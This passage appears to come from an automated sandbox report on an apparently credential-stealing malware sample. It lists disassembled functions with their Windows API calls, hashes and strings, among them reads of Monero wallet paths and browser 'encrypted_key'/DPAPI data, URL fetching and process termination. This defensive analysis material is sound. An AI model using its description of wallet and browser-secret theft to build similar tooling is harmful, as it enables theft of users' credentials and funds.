                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: c516e6498319cf24aa7ac386c0c3ddf71252e2b0d6e936ac1dab9491916020d5
                                  • Instruction ID: ab39e55222d04467cbc64e0389ccc36a7e02a4114cf6e3b951f35816c0bd5e6d
                                  • Opcode Fuzzy Hash: c516e6498319cf24aa7ac386c0c3ddf71252e2b0d6e936ac1dab9491916020d5
                                  • Instruction Fuzzy Hash: 28F03075680358BBD7109BE5AC4EFEA7B7CEB14715F104154FE09E6280E6B05A88A7A0
                                  Function 00349DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00349E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00349E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 00349EA7
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • lstrcpy.KERNEL32(00000000,00374C48), ref: 00349FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: 9abae82c7e35748f46a5c6dcedbecceea5d6c371c22339d5499096d5dc6139b8
                                  • Instruction ID: 81f0f9e2824844ea2d3fd130f4a18bc7132618c3c4627f630dd4c78a63ead0c9
                                  • Opcode Fuzzy Hash: 9abae82c7e35748f46a5c6dcedbecceea5d6c371c22339d5499096d5dc6139b8
                                  • Instruction Fuzzy Hash: 36518931A10209ABCB22EF68DC85B9F77E8AF54315F554025FD09AF241DB70FD558BA0
                                  Function 00345640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00345661
                                  • InternetOpenA.WININET(0036CFEC,00000000,00000000,00000000,00000000), ref: 00345677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00345692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003456BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 003456E1
                                  • InternetCloseHandle.WININET(?), ref: 003456FA
                                  • InternetCloseHandle.WININET(00000000), ref: 00345701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: f05811a94d63bc294a2ed56b6d534beb0c98468fd1720fbaf7cbc4a2f7ae31eb
                                  • Instruction ID: c7893d687db90e1caa79d0cc77803ce6b0d47e28083f4c416ac324e190979864
                                  • Opcode Fuzzy Hash: f05811a94d63bc294a2ed56b6d534beb0c98468fd1720fbaf7cbc4a2f7ae31eb
                                  • Instruction Fuzzy Hash: 6E417D70E00205AFDB15CF54ED88FAABBF5FF48311F158069E9089B291D771A985DF90
                                  Function 00364740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00364759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00364769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0036477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003647AB
                                  • CloseHandle.KERNEL32(00000000), ref: 003647B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003647C0
                                  • CloseHandle.KERNEL32(00000000), ref: 003647CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 48517e9b2c7d0be2d090f640f4a0fdc301af7518bbcdd97fcbb97a632c9d835f
                                  • Instruction ID: 0361213f989c2782ba06befe1b8f832720bbb300c0ca5d33a4587a9654308dd3
                                  • Opcode Fuzzy Hash: 48517e9b2c7d0be2d090f640f4a0fdc301af7518bbcdd97fcbb97a632c9d835f
                                  • Instruction Fuzzy Hash: 2501B171A41214AFE7225F60AC8DFEA77BCEB59752F004194F90ED1180EF708DC8AAA0
                                  Function 003583E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00358435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035846C
                                  • lstrlen.KERNEL32(00000000), ref: 003584B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003584E9
                                  • lstrlen.KERNEL32(00000000), ref: 003584FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035852E
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 0035853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: bd71a31ce6e386b8cfe221694180549e1f53450edb1fb2ac06da2e67c5318658
                                  • Instruction ID: 194002685af8bb3b86a048959f00c33e63604fad8584f8c7dce7ee74c834ec58
                                  • Opcode Fuzzy Hash: bd71a31ce6e386b8cfe221694180549e1f53450edb1fb2ac06da2e67c5318658
                                  • Instruction Fuzzy Hash: 245181755002029FCB22DF29D884E6BB7F9EF59301F258859EC45EB255EF30E949CBA0
                                  Function 00362910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00362925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,00F9B8B8,00000000,00020119,003628A9), ref: 0036294B
                                  • RegQueryValueExA.ADVAPI32(003628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00362965
                                  • RegCloseKey.ADVAPI32(003628A9), ref: 0036296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: a592783d142adfcf2b4a0a9031c113c642aa59715fe886dc6a01ea8e6355cf23
                                  • Instruction ID: 1ade4dbb520d24c5fb0efaab0c9053f9aa5ed4ca0e731cdcbde848ac7767bc71
                                  • Opcode Fuzzy Hash: a592783d142adfcf2b4a0a9031c113c642aa59715fe886dc6a01ea8e6355cf23
                                  • Instruction Fuzzy Hash: A501D475A40314ABD310CBA0EC5DEFB7BBCEB48711F104058FE49D7240EB715958A7A0
                                  Function 00362880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00362895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036289C
                                    • Part of subcall function 00362910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00362925
                                    • Part of subcall function 00362910: RtlAllocateHeap.NTDLL(00000000), ref: 0036292C
                                    • Part of subcall function 00362910: RegOpenKeyExA.ADVAPI32(80000002,00F9B8B8,00000000,00020119,003628A9), ref: 0036294B
                                    • Part of subcall function 00362910: RegQueryValueExA.ADVAPI32(003628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00362965
                                    • Part of subcall function 00362910: RegCloseKey.ADVAPI32(003628A9), ref: 0036296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,00F9B8B8,00000000,00020119,00359500), ref: 003628D1
                                  • RegQueryValueExA.ADVAPI32(00359500,00FAD9D0,00000000,00000000,00000000,000000FF), ref: 003628EC
                                  • RegCloseKey.ADVAPI32(00359500), ref: 003628F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 388c5fe5d46a72166a309579bd6c62e0e29fc67388d5f0f5abcedce01f3d29fa
                                  • Instruction ID: f1185bae56519478c0a4e00a1ee4571cda27b23486aad1e6ac64dc6c8d326048
                                  • Opcode Fuzzy Hash: 388c5fe5d46a72166a309579bd6c62e0e29fc67388d5f0f5abcedce01f3d29fa
                                  • Instruction Fuzzy Hash: 4301A2B5650218BBD7109BA4BC4DEBB777DEB54311F004154FE0CD7250DA705988B7A0
                                  Function 003471F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 0034723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00347279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00347280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003472C3
                                  • HeapFree.KERNEL32(00000000), ref: 003472CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00347329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: 15aebfce354a658d8345803d64b66203670006ad9e8ff945c9b8ee3dfd7a02e0
                                  • Instruction ID: 0aec643c5715612a2debf82d8d9511eb539aac03e5ddc0997e75e94a39d6fb5a
                                  • Opcode Fuzzy Hash: 15aebfce354a658d8345803d64b66203670006ad9e8ff945c9b8ee3dfd7a02e0
                                  • Instruction Fuzzy Hash: 47414B75A056069BDB21CF69EC84BAAB3E8EB84305F144569EC4DCB310E771F944ABA0
                                  Function 00349C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00349CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00349CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: aff461d0a83c64c6dd78fb9259cb52a276f9269df3fed2266c62983ed0048c6b
                                  • Instruction ID: 5983c0373c2dda49ff734dd8de1273a3d68454d93666d7331721ab1c1859885d
                                  • Opcode Fuzzy Hash: aff461d0a83c64c6dd78fb9259cb52a276f9269df3fed2266c62983ed0048c6b
                                  • Instruction Fuzzy Hash: D4417C31E002099BCB22EF64DC85AAFB7F4AF55304F4545A5FD25AF262DA30BD05C7A0
                                  Function 0035E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035EA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035EA61
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035EA7A
                                  • lstrcat.KERNEL32(?,00FA88F8), ref: 0035EA8D
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035EA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
